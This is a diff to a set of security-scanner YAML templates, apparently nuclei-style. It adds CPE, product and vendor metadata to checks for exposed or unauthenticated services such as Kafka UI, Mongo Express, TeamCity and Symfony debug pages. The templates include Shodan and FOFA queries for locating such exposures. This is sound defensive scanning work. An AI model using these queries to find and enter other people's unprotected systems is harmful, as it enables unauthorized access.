a/http/misconfiguration/springboot/springboot-auditevents.yaml +++ b/http/misconfiguration/springboot/springboot-auditevents.yaml @@ -11,10 +11,13 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cvss-score: 0 cwe-id: CWE-200 + cpe: cpe:2.3:a:vmware:spring_boot:*:*:*:*:*:*:*:* metadata: verified: true max-request: 2 shodan-query: title:"Eureka" + product: spring_boot + vendor: vmware tags: misconfig,springboot,exposure http: diff --git a/http/misconfiguration/sql-server-report-viewer.yaml b/http/misconfiguration/sql-server-report-viewer.yaml index 0cb1bc83ab..aacd516a5d 100644 --- a/http/misconfiguration/sql-server-report-viewer.yaml +++ b/http/misconfiguration/sql-server-report-viewer.yaml @@ -11,8 +11,12 @@ info: verified: true max-request: 2 google-query: inurl:"/Reports/Pages/Folder.aspx" + product: sql_server + vendor: microsoft tags: misconfig,sql,report,exposure + classification: + cpe: cpe:2.3:a:microsoft:sql_server:*:*:*:*:*:*:*:* http: - raw: - | @@ -28,4 +32,4 @@ http: - "status_code_1 == 200 && status_code_2 != 401" - "contains(body, 'Data Source') && contains(body, 'SQL Server Reporting Services')" condition: and -# digest: 4b0a004830460221008feccb6f64b565bdc0c250a76bf836e3fa99a59c5a9b7f80327b4f4628fdeaa60221008a23345dd57c7dbbce3370ad35499b7aaf50fe496815d0d9c30740b73e81bccf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a004830460221008feccb6f64b565bdc0c250a76bf836e3fa99a59c5a9b7f80327b4f4628fdeaa60221008a23345dd57c7dbbce3370ad35499b7aaf50fe496815d0d9c30740b73e81bccf:922c64590222798bb761d5b6d8e72950 diff --git a/http/misconfiguration/struts-ognl-console.yaml b/http/misconfiguration/struts-ognl-console.yaml index a6854cee26..e6bfaef00f 100644 --- a/http/misconfiguration/struts-ognl-console.yaml +++ b/http/misconfiguration/struts-ognl-console.yaml @@ -13,8 +13,12 @@ info: verified: true max-request: 1 shodan-query: html:"Struts Problem Report" + product: struts + vendor: apache tags: apache,struts,ognl,panel,misconfig + classification: + cpe: cpe:2.3:a:apache:struts:*:*:*:*:*:*:*:* http: - method: GET path: diff --git a/http/misconfiguration/symfony-debug.yaml b/http/misconfiguration/symfony-debug.yaml index 3090850271..9f72409569 100644 --- a/http/misconfiguration/symfony-debug.yaml +++ b/http/misconfiguration/symfony-debug.yaml @@ -11,8 +11,12 @@ info: verified: true max-request: 4 shodan-query: http.html:"symfony Profiler" + product: symfony + vendor: sensiolabs tags: symfony,debug,misconfig + classification: + cpe: cpe:2.3:a:sensiolabs:symfony:*:*:*:*:*:*:*:* http: - method: GET path: @@ -38,4 +42,4 @@ http: - 'debug mode
is enabled.' - 'id="sfWebDebugSymfony"' condition: or -# digest: 4a0a00473045022069056fb64b4574b300514814e9e34e3e7e6c16b214fe362580f5fc0f3d89f3020221008ee8fee42144aafbe47e2bf3fc62312b5cefdbf641f3a5264aa774f27d9ffdd4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022069056fb64b4574b300514814e9e34e3e7e6c16b214fe362580f5fc0f3d89f3020221008ee8fee42144aafbe47e2bf3fc62312b5cefdbf641f3a5264aa774f27d9ffdd4:922c64590222798bb761d5b6d8e72950 diff --git a/http/misconfiguration/symfony-fragment.yaml b/http/misconfiguration/symfony-fragment.yaml index c8908a806d..4a6afb0e0d 100644 --- a/http/misconfiguration/symfony-fragment.yaml +++ b/http/misconfiguration/symfony-fragment.yaml @@ -15,8 +15,12 @@ info: verified: true max-request: 1 shodan-query: http.html:"symfony Profiler" + product: symfony + vendor: sensiolabs tags: config,exposure,symfony,misconfig + classification: + cpe: cpe:2.3:a:sensiolabs:symfony:*:*:*:*:*:*:*:* http: - method: GET path: diff --git a/http/misconfiguration/syncthing-dashboard.yaml b/http/misconfiguration/syncthing-dashboard.yaml index 16ad3b9d71..1d9780530b 100644 --- a/http/misconfiguration/syncthing-dashboard.yaml +++ b/http/misconfiguration/syncthing-dashboard.yaml @@ -11,8 +11,12 @@ info: verified: true max-request: 1 shodan-query: http.html:'ng-app="syncthing"' + product: syncthing + vendor: syncthing tags: misconfig,syncthing,exposure + classification: + cpe: cpe:2.3:a:syncthing:syncthing:*:*:*:*:*:*:*:* http: - method: GET path: @@ -33,4 +37,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502205db143cdb0dee37c6e955a52fafa998e05c4a6d0beb21eabb8d846c2a2c45b6f022100cc2a6b7afa3e6676037255c4d1db949251e3435545e3e87ccc60d370f2885c98:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502205db143cdb0dee37c6e955a52fafa998e05c4a6d0beb21eabb8d846c2a2c45b6f022100cc2a6b7afa3e6676037255c4d1db949251e3435545e3e87ccc60d370f2885c98:922c64590222798bb761d5b6d8e72950 diff --git a/http/misconfiguration/tasmota-config-webui.yaml b/http/misconfiguration/tasmota-config-webui.yaml index 5c55685b6d..f7db62d699 100644 --- a/http/misconfiguration/tasmota-config-webui.yaml +++ b/http/misconfiguration/tasmota-config-webui.yaml @@ -11,8 +11,12 @@ info: verified: true max-request: 1 shodan-query: title:"Tasmota" + product: tasmota + vendor: tasmota_project tags: misconfig,tasmota,exposure,config + classification: + cpe: cpe:2.3:o:tasmota_project:tasmota:*:*:*:*:*:*:*:* http: - method: GET path: @@ -42,4 +46,4 @@ http: group: 1 regex: - "Tasmota ([0-9.]+) " -# digest: 4a0a004730450221009a3fb36a5c5568abcb2356994a89c068e827c0f59eda5689048364dd719c1c9c02203d3203f10e9c9017833676213cc6e692ee3c733b58d443ae8f084cf60d679ea4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450221009a3fb36a5c5568abcb2356994a89c068e827c0f59eda5689048364dd719c1c9c02203d3203f10e9c9017833676213cc6e692ee3c733b58d443ae8f084cf60d679ea4:922c64590222798bb761d5b6d8e72950 diff --git a/http/misconfiguration/teamcity/teamcity-guest-login-enabled.yaml b/http/misconfiguration/teamcity/teamcity-guest-login-enabled.yaml index 5d32010fba..45271ed06e 100644 --- a/http/misconfiguration/teamcity/teamcity-guest-login-enabled.yaml +++ b/http/misconfiguration/teamcity/teamcity-guest-login-enabled.yaml @@ -13,10 +13,13 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N cvss-score: 7.3 cwe-id: CWE-200 + cpe: cpe:2.3:a:jetbrains:teamcity:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 shodan-query: http.component:"TeamCity" + product: teamcity + vendor: jetbrains tags: misconfig,teamcity,jetbrains http: diff --git a/http/misconfiguration/teamcity/teamcity-registration-enabled.yaml b/http/misconfiguration/teamcity/teamcity-registration-enabled.yaml index 9e9de0350c..97233b261f 100644 --- a/http/misconfiguration/teamcity/teamcity-registration-enabled.yaml +++ b/http/misconfiguration/teamcity/teamcity-registration-enabled.yaml @@ -12,10 +12,13 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N cvss-score: 7.3 cwe-id: CWE-200 + cpe: cpe:2.3:a:jetbrains:teamcity:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 shodan-query: http.component:"TeamCity" + product: teamcity + vendor: jetbrains tags: misconfig,auth-bypass,teamcity,jetbrains,intrusive http: diff --git a/http/misconfiguration/teslamate-unauth-access.yaml b/http/misconfiguration/teslamate-unauth-access.yaml index 845642aa56..27b2e97c98 100644 --- a/http/misconfiguration/teslamate-unauth-access.yaml +++ b/http/misconfiguration/teslamate-unauth-access.yaml @@ -11,8 +11,12 @@ info: max-request: 1 shodan-query: http.favicon.hash:-1478287554 fofa-query: title="teslamate" + product: teslamate + vendor: teslamate_project tags: misconfig,teslamate,unauth + classification: + cpe: cpe:2.3:a:teslamate_project:teslamate:*:*:*:*:*:*:*:* http: - method: GET path: diff --git a/http/misconfiguration/thinkphp-errors.yaml b/http/misconfiguration/thinkphp-errors.yaml index bd0a14bc47..61ceebd195 100644 --- a/http/misconfiguration/thinkphp-errors.yaml +++ b/http/misconfiguration/thinkphp-errors.yaml @@ -9,8 +9,12 @@ info: verified: true max-request: 1 fofa-query: app="ThinkPHP" && title="System Error" + product: thinkphp + vendor: thinkphp tags: thinkphp,misconfig,exposure + classification: + cpe: cpe:2.3:a:thinkphp:thinkphp:*:*:*:*:*:*:*:* http: - method: GET path: @@ -46,4 +50,4 @@ http: - 500 - 404 condition: or -# digest: 490a00463044022003b009962dedd16ae6b50cf5a4c5880e38788366de0a4365a425d5d5b1141ad60220631fa6eea81343a0d0fce43cf8db4c0e7d87a6dc9b02403426e526a5a04bd5dc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022003b009962dedd16ae6b50cf5a4c5880e38788366de0a4365a425d5d5b1141ad60220631fa6eea81343a0d0fce43cf8db4c0e7d87a6dc9b02403426e526a5a04bd5dc:922c64590222798bb761d5b6d8e72950 diff --git a/http/misconfiguration/tomcat-stacktraces.yaml b/http/misconfiguration/tomcat-stacktraces.yaml index 0f7b97d0f1..e793c21900 100644 --- a/http/misconfiguration/tomcat-stacktraces.yaml +++ b/http/misconfiguration/tomcat-stacktraces.yaml @@ -10,8 +10,12 @@ info: verified: true max-request: 1 shodan-query: title:"Apache Tomcat" + product: tomcat + vendor: apache tags: misconfig,tech,tomcat,apache + classification: + cpe: cpe:2.3:a:apache:tomcat:*:*:*:*:*:*:*:* http: - method: GET path: @@ -24,4 +28,4 @@ http: - 'contains(body, "org.apache")' - status_code == 400 condition: and -# digest: 4b0a00483046022100acbebae47fea74944e9c0ecc1ab66fca13dd7c4dbd8771d5601fed9db72a0cf0022100b63d7e443f534f20cbad1632af42b8c663ab034e41b5efeb67ff784e3ea3802f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100acbebae47fea74944e9c0ecc1ab66fca13dd7c4dbd8771d5601fed9db72a0cf0022100b63d7e443f534f20cbad1632af42b8c663ab034e41b5efeb67ff784e3ea3802f:922c64590222798bb761d5b6d8e72950 diff --git a/http/misconfiguration/transmission-dashboard.yaml b/http/misconfiguration/transmission-dashboard.yaml index 59d95b26cd..b7287aa4f4 100644 --- a/http/misconfiguration/transmission-dashboard.yaml +++ b/http/misconfiguration/transmission-dashboard.yaml @@ -11,10 +11,13 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N cvss-score: 5.3 cwe-id: CWE-200 + cpe: cpe:2.3:a:transmissionbt:transmission:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 shodan-query: http.title:"Transmission Web Interface" + product: transmission + vendor: transmissionbt tags: misconfig,transmission,exposure,dashboard http: diff --git a/http/misconfiguration/typo3-composer.yaml b/http/misconfiguration/typo3-composer.yaml index fc20ce2939..52f9c545e0 100644 --- a/http/misconfiguration/typo3-composer.yaml +++ b/http/misconfiguration/typo3-composer.yaml @@ -12,8 +12,12 @@ info: verified: true max-request: 1 shodan-query: "X-TYPO3-Parsetime: 0ms" + product: typo3 + vendor: typo3 tags: typo3,cms,exposure,misconfig + classification: + cpe: cpe:2.3:a:typo3:typo3:*:*:*:*:*:*:*:* http: - method: GET path: diff --git a/http/misconfiguration/typo3-debug-mode.yaml b/http/misconfiguration/typo3-debug-mode.yaml index 7dc0f51c21..95cf35189b 100644 --- a/http/misconfiguration/typo3-debug-mode.yaml +++ b/http/misconfiguration/typo3-debug-mode.yaml @@ -9,8 +9,12 @@ info: verified: true max-request: 1 shodan-query: http.title:"TYPO3 Exception" + product: typo3 + vendor: typo3 tags: typo3,debug,misconfig + classification: + cpe: cpe:2.3:a:typo3:typo3:*:*:*:*:*:*:*:* http: - method: GET path: @@ -28,4 +32,4 @@ http: - type: status status: - 500 -# digest: 4a0a0047304502201ee7bbd8a77d4f954f0fcd10371c8958454bc550573570294a6e5cd1ca91ae04022100980d4e085f07ca32d2eaaf49e513b2a375889affd352bd0b364a819afc168fb6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502201ee7bbd8a77d4f954f0fcd10371c8958454bc550573570294a6e5cd1ca91ae04022100980d4e085f07ca32d2eaaf49e513b2a375889affd352bd0b364a819afc168fb6:922c64590222798bb761d5b6d8e72950 diff --git a/http/misconfiguration/unauth-apache-kafka-ui.yaml b/http/misconfiguration/unauth-apache-kafka-ui.yaml index 97c278b880..fe895220fa 100644 --- a/http/misconfiguration/unauth-apache-kafka-ui.yaml +++ b/http/misconfiguration/unauth-apache-kafka-ui.yaml @@ -12,8 +12,12 @@ info: verified: true max-request: 2 shodan-query: http.title:"UI for Apache Kafka" + product: kafka + vendor: apache tags: misconfig,apache,kafka,unauth,exposure + classification: + cpe: cpe:2.3:a:apache:kafka:*:*:*:*:*:*:*:* http: - method: GET path: diff --git a/http/misconfiguration/unauth-celery-flower.yaml b/http/misconfiguration/unauth-celery-flower.yaml index 13de5b3b8a..c7ea9ebd3a 100644 --- a/http/misconfiguration/unauth-celery-flower.yaml +++ b/http/misconfiguration/unauth-celery-flower.yaml @@ -9,8 +9,12 @@ info: metadata: max-request: 1 shodan-query: http.favicon.hash:-374133142 + product: flower + vendor: flower_project tags: celery,flower,unauth,misconfig + classification: + cpe: cpe:2.3:a:flower_project:flower:*:*:*:*:*:*:*:* http: - method: GET path: @@ -28,4 +32,4 @@ http: - type: status status: - 200 -# digest: 490a00463044022035c4a49f967fe61a41af8ca9b7ef7593aae1af64378c0724f8d653c03b7c2f5b02205ce594331fc5fd9f4d464423082c469ef27162cbafa76ad3b0c569416bb81866:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022035c4a49f967fe61a41af8ca9b7ef7593aae1af64378c0724f8d653c03b7c2f5b02205ce594331fc5fd9f4d464423082c469ef27162cbafa76ad3b0c569416bb81866:922c64590222798bb761d5b6d8e72950 diff --git a/http/misconfiguration/unauth-etherpad.yaml b/http/misconfiguration/unauth-etherpad.yaml index 9f8528c7bd..de89986046 100644 --- a/http/misconfiguration/unauth-etherpad.yaml +++ b/http/misconfiguration/unauth-etherpad.yaml @@ -10,8 +10,12 @@ info: verified: true max-request: 1 shodan-query: http.html:"index.createOpenPad" + product: etherpad + vendor: etherpad tags: etherpad,misconfig,unauth + classification: + cpe: cpe:2.3:a:etherpad:etherpad:*:*:*:*:*:*:*:* http: - method: GET path: diff --git a/http/misconfiguration/unauth-ldap-account-manager.yaml b/http/misconfiguration/unauth-ldap-account-manager.yaml index 45fef54473..4d8eefef4f 100644 --- a/http/misconfiguration/unauth-ldap-account-manager.yaml +++ b/http/misconfiguration/unauth-ldap-account-manager.yaml @@ -9,8 +9,12 @@ info: verified: true max-request: 1 shodan-query: http.title:"LDAP Account Manager" + product: ldap_account_manager + vendor: ldap-account-manager tags: ldap,misconfig,unauth + classification: + cpe: cpe:2.3:a:ldap-account-manager:ldap_account_manager:*:*:*:*:*:*:*:* http: - method: GET path: @@ -34,4 +38,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100eb37d1c6fabba844b609feb86ee959249326bf888667b194afcb0ff37dd9e91b022037213b13d2f0a714a76ac3f03bd64b5ef49037ed317d3da37ca410ff3d459d98:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100eb37d1c6fabba844b609feb86ee959249326bf888667b194afcb0ff37dd9e91b022037213b13d2f0a714a76ac3f03bd64b5ef49037ed317d3da37ca410ff3d459d98:922c64590222798bb761d5b6d8e72950 diff --git a/http/misconfiguration/unauth-mercurial.yaml b/http/misconfiguration/unauth-mercurial.yaml index d0d7545fa2..2b977f0b60 100644 --- a/http/misconfiguration/unauth-mercurial.yaml +++ b/http/misconfiguration/unauth-mercurial.yaml @@ -9,8 +9,12 @@ info: verified: true max-request: 1 shodan-query: html:"Mercurial repositories index" + product: mercurial + vendor: mercurial tags: misconfig,unauth,mercurial + classification: + cpe: cpe:2.3:a:mercurial:mercurial:*:*:*:*:*:*:*:* http: - method: GET path: @@ -28,4 +32,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100f039fb9fa153dfcc07c3b410d3a44973ec66f34f513aa70515ff06ed8fca7f81022041dd62f921a62c32553f6a37ea7ab4e78cd7eea7885fe645b5e69c6bd2db7f8e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100f039fb9fa153dfcc07c3b410d3a44973ec66f34f513aa70515ff06ed8fca7f81022041dd62f921a62c32553f6a37ea7ab4e78cd7eea7885fe645b5e69c6bd2db7f8e:922c64590222798bb761d5b6d8e72950 diff --git a/http/misconfiguration/unauth-temporal-web-ui.yaml b/http/misconfiguration/unauth-temporal-web-ui.yaml index 5a81343763..c2a73c5805 100644 --- a/http/misconfiguration/unauth-temporal-web-ui.yaml +++ b/http/misconfiguration/unauth-temporal-web-ui.yaml @@ -11,10 +11,13 @@ info: classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 + cpe: cpe:2.3:a:temporal:temporal:*:*:*:*:*:*:*:* metadata: verified: "true" max-request: 2 shodan-query: http.favicon.hash:557327884 + product: temporal + vendor: temporal tags: misconfig,temporal,unauth http: @@ -34,4 +37,4 @@ http: - "contains(body_2, 'nextPageToken') && status_code_2 == 200" - "contains(body_2, 'Namespace default is not found.') && status_code_2 == 404" condition: or -# digest: 4b0a00483046022100e23471f799588e5121a981fa02bd8b1490449748125c06235ea2e1607e2439e3022100a92beae88b23261b448c696a9863d008afae153ea3759317a41ef9958c02e31e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100e23471f799588e5121a981fa02bd8b1490449748125c06235ea2e1607e2439e3022100a92beae88b23261b448c696a9863d008afae153ea3759317a41ef9958c02e31e:922c64590222798bb761d5b6d8e72950 diff --git a/http/misconfiguration/unauthenticated-alert-manager.yaml b/http/misconfiguration/unauthenticated-alert-manager.yaml index c5843aa5ef..5b08cfa491 100644 --- a/http/misconfiguration/unauthenticated-alert-manager.yaml +++ b/http/misconfiguration/unauthenticated-alert-manager.yaml @@ -8,8 +8,12 @@ info: metadata: max-request: 1 shodan-query: http.title:"Alertmanager" + product: alertmanager + vendor: prometheus tags: unauth,alertmanager,misconfig + classification: + cpe: cpe:2.3:a:prometheus:alertmanager:*:*:*:*:*:*:*:* http: - method: GET path: diff --git a/http/misconfiguration/unauthenticated-mongo-express.yaml b/http/misconfiguration/unauthenticated-mongo-express.yaml index 8ca44f5954..4e356dd670 100644 --- a/http/misconfiguration/unauthenticated-mongo-express.yaml +++ b/http/misconfiguration/unauthenticated-mongo-express.yaml @@ -11,8 +11,12 @@ info: verified: true max-request: 3 shodan-query: title:"Home - Mongo Express" + product: mongo-express + vendor: mongo-express_project tags: mongo,unauth,edb,misconfig + classification: + cpe: cpe:2.3:a:mongo-express_project:mongo-express:*:*:*:*:*:*:*:* http: - method: GET path: diff --git a/http/misconfiguration/unauthorized-h3csecparh-login.yaml b/http/misconfiguration/unauthorized-h3csecparh-login.yaml index a4d8964e36..7a6ca2b072 100644 --- a/http/misconfiguration/unauthorized-h3csecparh-login.yaml +++ b/http/misconfiguration/unauthorized-h3csecparh-login.yaml @@ -10,8 +10,12 @@ info: max-request: 1 shodan-query: http.html:"H3C-SecPath-运维审计系统" fofa-query: app="H3C-SecPath-运维审计系统" && body="2018" + product: secpath_f5060 + vendor: h3c tags: h3c,default-login,unauth,misconfig + classification: + cpe: cpe:2.3:h:h3c:secpath_f5060:*:*:*:*:*:*:*:* http: - method: GET path: diff --git a/http/misconfiguration/untangle-admin-setup.yaml b/http/misconfiguration/untangle-admin-setup.yaml index 1ea0c52d38..9ffc666929 100644 --- a/http/misconfiguration/untangle-admin-setup.yaml +++ b/http/misconfiguration/untangle-admin-setup.yaml @@ -10,8 +10,12 @@ info: max-request: 1 shodan-query: title:"Setup Wizard" html:"untangle" fofa-query: title="Setup Wizard" && "untangle" + product: ng_firewall + vendor: untangle tags: misconfig,untangle,admin,setup + classification: + cpe: cpe:2.3:a:untangle:ng_firewall:*:*:*:*:*:*:*:* http: - method: GET path: @@ -29,4 +33,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100d42c9165fc09a3a5155eb20e9de1d953b57381acddd1ce6942fe386dea3d884c022052d8ec52b7ebebbb449b6e557920fbf94eb672e29a82ffd7a8bb479cac842ccc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100d42c9165fc09a3a5155eb20e9de1d953b57381acddd1ce6942fe386dea3d884c022052d8ec52b7ebebbb449b6e557920fbf94eb672e29a82ffd7a8bb479cac842ccc:922c64590222798bb761d5b6d8e72950 diff --git a/http/misconfiguration/zabbix-error.yaml b/http/misconfiguration/zabbix-error.yaml index 7b328f08f6..ff003d566e 100644 --- a/http/misconfiguration/zabbix-error.yaml +++ b/http/misconfiguration/zabbix-error.yaml @@ -9,9 +9,12 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cvss-score: 0 cwe-id: CWE-200 + cpe: cpe:2.3:a:zabbix:zabbix_server:*:*:*:*:*:*:*:* metadata: max-request: 1 shodan-query: http.title:"Warning [refreshed every 30 sec.]" + product: zabbix_server + vendor: zabbix tags: zabbix,misconfig http: diff --git a/http/technologies/4D-detect.yaml b/http/technologies/4D-detect.yaml index 094712f06e..1c1b41754a 100644 --- a/http/technologies/4D-detect.yaml +++ b/http/technologies/4D-detect.yaml @@ -13,8 +13,12 @@ info: verified: true max-request: 1 shodan-query: http.html:"4DACTION/" + product: 4d + vendor: 4d tags: 4D,detect,tech + classification: + cpe: cpe:2.3:a:4d:4d:*:*:*:*:*:*:*:* http: - method: GET path: @@ -44,4 +48,4 @@ http: group: 1 regex: - 'Server:\s+4D(?:_V[0-9]+)?/([0-9.]+)' -# digest: 4b0a00483046022100f7a8acd9ea27d789dfe331eff80913f64f9ee6fe84c386fab6035b8ea0fa2bb602210091d93c4de5b4d1c943d244e07faf8403d8c4b2b59c5716ca5810cb9987ca6384:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100f7a8acd9ea27d789dfe331eff80913f64f9ee6fe84c386fab6035b8ea0fa2bb602210091d93c4de5b4d1c943d244e07faf8403d8c4b2b59c5716ca5810cb9987ca6384:922c64590222798bb761d5b6d8e72950 diff --git a/http/technologies/activecollab-detect.yaml b/http/technologies/activecollab-detect.yaml index 6471974f26..40a67a5a6a 100644 --- a/http/technologies/activecollab-detect.yaml +++ b/http/technologies/activecollab-detect.yaml @@ -7,8 +7,12 @@ info: metadata: max-request: 1 fofa-query: app="ActiveCollab" + product: activecollab + vendor: activecollab tags: acsoft,tech,activecollab + classification: + cpe: cpe:2.3:a:activecollab:activecollab:*:*:*:*:*:*:*:* http: - method: GET path: diff --git a/http/technologies/adobe/adobe-coldfusion-detect.yaml b/http/technologies/adobe/adobe-coldfusion-detect.yaml index e19f7d4be2..44c32cbc88 100644 --- a/http/technologies/adobe/adobe-coldfusion-detect.yaml +++ b/http/technologies/adobe/adobe-coldfusion-detect.yaml @@ -9,8 +9,12 @@ info: verified: true max-request: 6 shodan-query: http.component:"Adobe ColdFusion" + product: coldfusion + vendor: adobe tags: adobe,coldfusion,tech + classification: + cpe: cpe:2.3:a:adobe:coldfusion:*:*:*:*:*:*:*:* http: - method: GET path: diff --git a/http/technologies/adobe/adobe-coldfusion-error-detect.yaml b/http/technologies/adobe/adobe-coldfusion-error-detect.yaml index efe9fab702..5790db3e1b 100644 --- a/http/technologies/adobe/adobe-coldfusion-error-detect.yaml +++ b/http/technologies/adobe/adobe-coldfusion-error-detect.yaml @@ -11,8 +11,12 @@ info: verified: true max-request: 1 shodan-query: http.component:"Adobe ColdFusion" + product: coldfusion + vendor: adobe tags: adobe,coldfusion,tech + classification: + cpe: cpe:2.3:a:adobe:coldfusion:*:*:*:*:*:*:*:* http: - method: GET path: diff --git a/http/technologies/aem-detect.yaml b/http/technologies/aem-detect.yaml index c40b6cfa15..f4b0c6a8f5 100644 --- a/http/technologies/aem-detect.yaml +++ b/http/technologies/aem-detect.yaml @@ -13,8 +13,12 @@ info: metadata: max-request: 1 shodan-query: http.component:"Adobe Experience Manager" + product: experience_manager + vendor: adobe tags: aem,favicon,tech,adobe + classification: + cpe: cpe:2.3:a:adobe:experience_manager:*:*:*:*:*:*:*:* http: - method: GET path: diff --git a/http/technologies/aerocms-detect.yaml b/http/technologies/aerocms-detect.yaml index 83a10cdf56..a3127078cd 100644 --- a/http/technologies/aerocms-detect.yaml +++ b/http/technologies/aerocms-detect.yaml @@ -9,8 +9,12 @@ info: max-request: 1 shodan-query: title:"AeroCMS" fofa-query: "AeroCMS" + product: aerocms + vendor: aerocms_project tags: tech,aerocms + classification: + cpe: cpe:2.3:a:aerocms_project:aerocms:*:*:*:*:*:*:*:* http: - method: GET path: diff --git a/http/technologies/angular-detect.yaml b/http/technologies/angular-detect.yaml index ee01efcaa1..a918d681a8 100644 --- a/http/technologies/angular-detect.yaml +++ b/http/technologies/angular-detect.yaml @@ -11,8 +11,12 @@ info: verified: true max-request: 1 shodan-query: html:"ng-version=" + product: angular + vendor: angular tags: tech,angular + classification: + cpe: cpe:2.3:a:angular:angular:*:*:*:*:node.js:*:*:* http: - method: GET path: diff --git a/http/technologies/apache/airflow-detect.yaml b/http/technologies/apache/airflow-detect.yaml index 89e53422cc..24ff2e4a76 100644 --- a/http/technologies/apache/airflow-detect.yaml +++ b/http/technologies/apache/airflow-detect.yaml @@ -8,8 +8,12 @@ info: verified: true max-request: 1 shodan-query: http.html:"Apache Airflow" + product: airflow + vendor: apache tags: tech,apache,airflow,intrusive + classification: + cpe: cpe:2.3:a:apache:airflow:*:*:*:*:*:*:*:* http: - method: GET path: @@ -25,4 +29,4 @@ http: - type: status status: - 404 -# digest: 4a0a00473045022100ed59cfb6802724e34fa5894563277a64889f3676ae6cdae4875a59bfd9e5366a02207589bb03b56a052916e5db355e492f5168909e2051039e97f66022052d90d590:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100ed59cfb6802724e34fa5894563277a64889f3676ae6cdae4875a59bfd9e5366a02207589bb03b56a052916e5db355e492f5168909e2051039e97f66022052d90d590:922c64590222798bb761d5b6d8e72950 diff --git a/http/technologies/apache/apache-answer-detect.yaml b/http/technologies/apache/apache-answer-detect.yaml index d6ee28ddba..c6348a58f6 100644 --- a/http/technologies/apache/apache-answer-detect.yaml +++ b/http/technologies/apache/apache-answer-detect.yaml @@ -13,8 +13,12 @@ info: max-request: 1 shodan-query: http.favicon.hash:523757057 fofa-query: icon_hash="523757057" + product: answer + vendor: apache tags: detect,tech,apache + classification: + cpe: cpe:2.3:a:apache:answer:*:*:*:*:*:*:*:* http: - method: GET path: @@ -42,4 +46,4 @@ http: name: version regex: - '"version":"([^"]+)"' -# digest: 4a0a004730450221009e8fd14022f6b92bd8f4859cea0b49820934628bc139239ba58c7c4f268a0bf6022064c229196be4da31c1f58e14368f395bf82afcd2e8679e584116bfd400b2dd2c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450221009e8fd14022f6b92bd8f4859cea0b49820934628bc139239ba58c7c4f268a0bf6022064c229196be4da31c1f58e14368f395bf82afcd2e8679e584116bfd400b2dd2c:922c64590222798bb761d5b6d8e72950 diff --git a/http/technologies/apache/apache-axis-detect.yaml b/http/technologies/apache/apache-axis-detect.yaml index 541ec83207..1cdab8933b 100644 --- a/http/technologies/apache/apache-axis-detect.yaml +++ b/http/technologies/apache/apache-axis-detect.yaml @@ -9,8 +9,12 @@ info: verified: true max-request: 3 shodan-query: http.html:"Apache Axis" + product: axis + vendor: apache tags: tech,axis2,middleware,apache + classification: + cpe: cpe:2.3:a:apache:axis:*:*:*:*:*:*:*:* http: - method: GET path: diff --git a/http/technologies/apache/apache-cloudstack-detect.yaml b/http/technologies/apache/apache-cloudstack-detect.yaml index bff3d8bc77..2e168fbf59 100644 --- a/http/technologies/apache/apache-cloudstack-detect.yaml +++ b/http/technologies/apache/apache-cloudstack-detect.yaml @@ -4,12 +4,15 @@ info: name: Apache CloudStack - Detect author: pussycat0x severity: info - description: - CloudStack is open-source Infrastructure-as-a-Service cloud computing software for creating, managing, and deploying infrastructure cloud services. It uses existing hypervisor platforms for virtualization, such as KVM, VMware vSphere, including ESXi and vCenter, XenServer/XCP and XCP-ng. + description: CloudStack is open-source Infrastructure-as-a-Service cloud computing software for creating, managing, and deploying infrastructure cloud services. It uses existing hypervisor platforms for virtualization, such as KVM, VMware vSphere, including ESXi and vCenter, XenServer/XCP and XCP-ng. metadata: shodan-query: http.title:"Apache CloudStack" + product: cloudstack + vendor: apache tags: tech,apache,cloudstack + classification: + cpe: cpe:2.3:a:apache:cloudstack:*:*:*:*:*:*:*:* http: - method: GET path: @@ -26,4 +29,4 @@ http: - type: status status: - 200 -# digest: 4a0a004730450220268e39fea1438b8ede541f545337c0c6f6027159cbd433c75bd0f9be63877ea6022100b842369be9a18c54da45a39a9f188c687b365eb23b3869afadd42c22b7dbea08:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450220268e39fea1438b8ede541f545337c0c6f6027159cbd433c75bd0f9be63877ea6022100b842369be9a18c54da45a39a9f188c687b365eb23b3869afadd42c22b7dbea08:922c64590222798bb761d5b6d8e72950 diff --git a/http/technologies/apache/apache-cocoon-detect.yaml b/http/technologies/apache/apache-cocoon-detect.yaml index 64f8870cf3..f59e8702da 100644 --- a/http/technologies/apache/apache-cocoon-detect.yaml +++ 